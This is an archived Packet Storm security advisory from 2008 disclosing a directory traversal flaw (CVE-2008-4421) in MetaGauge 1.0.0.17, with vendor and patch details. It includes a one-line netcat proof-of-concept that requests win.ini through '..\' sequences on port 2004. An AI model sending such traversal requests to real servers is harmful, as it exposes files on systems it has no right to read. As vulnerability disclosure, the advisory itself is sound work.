Lucene search

K
packetstormBrad AntoniewiczPACKETSTORM:70624
HistoryOct 06, 2008 - 12:00 a.m.

hammer-traversal.txt

2008-10-0600:00:00
Brad Antoniewicz
packetstormsecurity.com
21

EPSS

0.025

Percentile

90.1%

`Title: MetaGauge 1.0.0.17 Directory Traversal  
  
-------------------------------------------------------------  
  
Vendor: Hammer Software  
  
Vendor URL: www.Hammer-Software.com  
  
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.  
  
Description:  
  
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.   
  
Example:  
  
C:\> nc targethost 2004  
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1  
  
  
Patch Information:  
  
Hammer has addressed the issue in the latest version of MetaGauge:  
  
http://dl.hammer-software.com/metagauge.zip  
  
CVE: CVE-2008-4421  
  
Credit:  
  
Brad Antoniewicz  
  
[email protected]  
  
  
`

EPSS

0.025

Percentile

90.1%